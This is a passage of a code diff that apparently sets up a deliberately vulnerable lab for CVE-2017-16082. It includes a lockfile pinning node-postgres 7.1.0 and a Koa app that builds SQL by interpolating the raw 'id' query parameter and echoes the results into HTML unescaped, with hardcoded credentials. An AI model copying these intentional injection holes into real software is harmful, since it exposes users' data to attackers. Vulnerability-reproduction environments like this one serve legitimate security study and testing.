"integrity": "sha1-IPEzZIGwg811M3mSoWlxqi2QaUc=",
"requires": {
"ee-first": "1.1.1"
}
},
"only": {
"version": "0.0.2",
"resolved": "https://registry.npmjs.org/only/-/only-0.0.2.tgz",
"integrity": "sha1-Kv3oTQPlC5qO3EROMGEKcCle37Q="
},
"packet-reader": {
"version": "0.3.1",
"resolved": "https://registry.npmjs.org/packet-reader/-/packet-reader-0.3.1.tgz",
"integrity": "sha1-zWLmCvjX/qinBexP+ZCHHEaHHyc="
},
"parseurl": {
"version": "1.3.2",
"resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.2.tgz",
"integrity": "sha1-/CidTtiZMRlGDBViUyYs3I3mW/M="
},
"pg": {
"version": "7.1.0",
"resolved": "https://registry.npmjs.org/pg/-/pg-7.1.0.tgz",
"integrity": "sha1-naPwnTmDUhUhwdg2m22aEwbP6f4=",
"requires": {
"buffer-writer": "1.0.1",
"packet-reader": "0.3.1",
"pg-connection-string": "0.1.3",
"pg-pool": "2.0.3",
"pg-types": "1.12.1",
"pgpass": "1.0.2",
"semver": "4.3.2"
}
},
"pg-connection-string": {
"version": "0.1.3",
"resolved": "https://registry.npmjs.org/pg-connection-string/-/pg-connection-string-0.1.3.tgz",
"integrity": "sha1-2hhHsglA5C7hSSvq9l1J2RskXfc="
},
"pg-pool": {
"version": "2.0.3",
"resolved": "https://registry.npmjs.org/pg-pool/-/pg-pool-2.0.3.tgz",
"integrity": "sha1-wCIDLIlJ8xKk+R+2QJzgQHa+Mlc="
},
"pg-types": {
"version": "1.12.1",
"resolved": "https://registry.npmjs.org/pg-types/-/pg-types-1.12.1.tgz",
"integrity": "sha1-1kCH45A7WP+q0nnnWVxSIIoUw9I=",
"requires": {
"postgres-array": "1.0.2",
"postgres-bytea": "1.0.0",
"postgres-date": "1.0.3",
"postgres-interval": "1.1.1"
}
},
"pgpass": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/pgpass/-/pgpass-1.0.2.tgz",
"integrity": "sha1-Knu0G2BltnkH6R2hsHwYR8h3swY=",
"requires": {
"split": "1.0.1"
}
},
"postgres-array": {
"version": "1.0.2",
"resolved": "https://registry.npmjs.org/postgres-array/-/postgres-array-1.0.2.tgz",
"integrity": "sha1-jgsy6wO/d6XAp4UeBEHBaaJWojg="
},
"postgres-bytea": {
"version": "1.0.0",
"resolved": "https://registry.npmjs.org/postgres-bytea/-/postgres-bytea-1.0.0.tgz",
"integrity": "sha1-AntTPAqokOJtFy1Hz5zOzFIazTU="
},
"postgres-date": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/postgres-date/-/postgres-date-1.0.3.tgz",
"integrity": "sha1-4tiXAu/bJY/52c7g/pG9BpdSV6g="
},
"postgres-interval": {
"version": "1.1.1",
"resolved": "https://registry.npmjs.org/postgres-interval/-/postgres-interval-1.1.1.tgz",
"integrity": "sha512-OkuCi9t/3CZmeQreutGgx/OVNv9MKHGIT5jH8KldQ4NLYXkvmT9nDVxEuCENlNwhlGPE374oA/xMqn05G49pHA==",
"requires": {
"xtend": "4.0.1"
}
},
"semver": {
"version": "4.3.2",
"resolved": "https://registry.npmjs.org/semver/-/semver-4.3.2.tgz",
"integrity": "sha1-x6BxWKgL7dBSNVt3DYLWZA+AO+c="
},
"setprototypeof": {
"version": "1.0.3",
"resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.0.3.tgz",
"integrity": "sha1-ZlZ+NwQ+608E2RvWWMDL77VbjgQ="
},
"split": {
"version": "1.0.1",
"resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz",
"integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==",
"requires": {
"through": "2.3.8"
}
},
"statuses": {
"version": "1.4.0",
"resolved": "https://registry.npmjs.org/statuses/-/statuses-1.4.0.tgz",
"integrity": "sha512-zhSCtt8v2NDrRlPQpCNtw/heZLtfUDqxBM1udqikb/Hbk52LK4nQSwr10u77iopCW5LsyHpuXS0GnEc48mLeew=="
},
"through": {
"version": "2.3.8",
"resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz",
"integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU="
},
"type-is": {
"version": "1.6.15",
"resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.15.tgz",
"integrity": "sha1-yrEPtJCeRByChC6v4a1kbIGARBA=",
"requires": {
"media-typer": "0.3.0",
"mime-types": "2.1.17"
}
},
"vary": {
"version": "1.1.2",
"resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz",
"integrity": "sha1-IpnwLG3tMNSllhsLn3RSShj2NPw="
},
"xtend": {
"version": "4.0.1",
"resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.1.tgz",
"integrity": "sha1-pcbVMr5lbiPbgg77lDofBJmNY68="
}
}
}

19
node/CVE-2017-16082/package.json Normal file
View File

@@ -0,0 +1,19 @@
{
"name": "node_postgres_example",
"version": "1.0.0",
"description": "",
"main": "app.js",
"scripts": {
"start": "wait-for-it.sh db:5432 && cd www/ && node app.js",
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [
"postgres"
],
"author": "phith0n",
"license": "MIT",
"dependencies": {
"koa": "^2.3.0",
"pg": "7.1.0"
}
}

32
node/CVE-2017-16082/www/app.js Normal file
View File

@@ -0,0 +1,32 @@
const Koa = require('koa')
const { Client } = require('pg')
const app = new Koa()
const client = new Client({
user: "postgres",
password: "postgres",
database: "example",
host: "db",
port: 5432
})
client.connect()
app.use(async ctx => {
ctx.response.type = 'html'
let id = ctx.request.query.id || 1
let sql = `SELECT * FROM "user" WHERE "id" = ${id}`
const res = await client.query(sql)
ctx.body = `<html>
<body>
<table>
<tr><th>id</th><td>${res.rows[0].id}</td></tr>
<tr><th>name</th><td>${res.rows[0].name}</td></tr>
<tr><th>score</th><td>${res.rows[0].score}</td></tr>
</table>
</body>
</html>`
})
app.listen(3000)